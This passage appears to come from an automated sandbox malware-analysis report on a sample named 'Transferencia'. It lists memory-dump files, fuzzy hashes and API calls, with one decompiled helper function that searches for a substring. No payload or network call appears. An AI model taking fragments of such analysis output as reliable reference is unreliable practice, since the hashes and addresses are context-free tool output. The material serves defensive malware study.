                                                • Associated: 00000000.00000002.755731847.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755772036.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755817113.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755939181.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755971847.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756009900.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756022297.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756029667.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Transferencia.jbxd
                                                Similarity
                                                • API ID: Free$GlobalLibrary
                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                • API String ID: 1100898210-3081826266
                                                • Opcode ID: 6ef17ecbb981fa3a9d26a37a654407d639bd202e425e8d1c53e2791914a5cf50
                                                • Instruction ID: 695255c2ecde24bf448a41ac97d2e3a141eb08f66f7233a7170c0cf0b0d44fd9
                                                • Opcode Fuzzy Hash: 6ef17ecbb981fa3a9d26a37a654407d639bd202e425e8d1c53e2791914a5cf50
                                                • Instruction Fuzzy Hash: A0E0123390112057C6215F55FE04B5AB77D6F45B26F05403BE980BB2618B786C428BDC
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00405F6F(void* __ecx, CHAR* _a4, CHAR* _a8) {
                                                				int _v8;
                                                				int _t12;
                                                				int _t14;
                                                				int _t15;
                                                				CHAR* _t17;
                                                				CHAR* _t27;
                                                
                                                				_t12 = lstrlenA(_a8);
                                                				_t27 = _a4;
                                                				_v8 = _t12;
                                                				while(lstrlenA(_t27) >= _v8) {
                                                					_t14 = _v8;
                                                					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
                                                					_t15 = lstrcmpiA(_t27, _a8);
                                                					_t27[_v8] =  *(_t14 + _t27);
                                                					if(_t15 == 0) {
                                                						_t17 = _t27;
                                                					} else {
                                                						_t27 = CharNextA(_t27);
                                                						continue;
                                                					}
                                                					L5:
                                                					return _t17;
                                                				}
                                                				_t17 = 0;
                                                				goto L5;
                                                			}









                                                0x00405f7f
                                                0x00405f81
                                                0x00405f84
                                                0x00405fb0
                                                0x00405f89
                                                0x00405f92
                                                0x00405f97
                                                0x00405fa2
                                                0x00405fa5
                                                0x00405fc1
                                                0x00405fa7
                                                0x00405fae
                                                0x00000000
                                                0x00405fae
                                                0x00405fba
                                                0x00405fbe
                                                0x00405fbe
                                                0x00405fb8
                                                0x00000000

                                                APIs
                                                • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406254,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F7F
                                                • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00406254,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F97
                                                • CharNextA.USER32(00000000,?,00000000,00406254,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA8
                                                • lstrlenA.KERNEL32(00000000,?,00000000,00406254,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FB1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.755415149.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.755408358.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755428109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755438602.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755693232.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755731847.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755772036.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755817113.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755939181.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755971847.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756009900.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756022297.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756029667.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Transferencia.jbxd
                                                Similarity
                                                • API ID: lstrlen$CharNextlstrcmpi
                                                • String ID:
                                                • API String ID: 190613189-0
                                                • Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                • Instruction ID: d1bddae3a0f18f97ac1aa465d67762edc6f3aabfb23b395e61e0e19fb30ac715
                                                • Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                • Instruction Fuzzy Hash: 50F0C231205414FFD7029FA5DE049AFBBA8EF06250B2140BAE840F7310DA78DE019BA8
                                                Uniqueness

                                                Uniqueness Score: -1.00%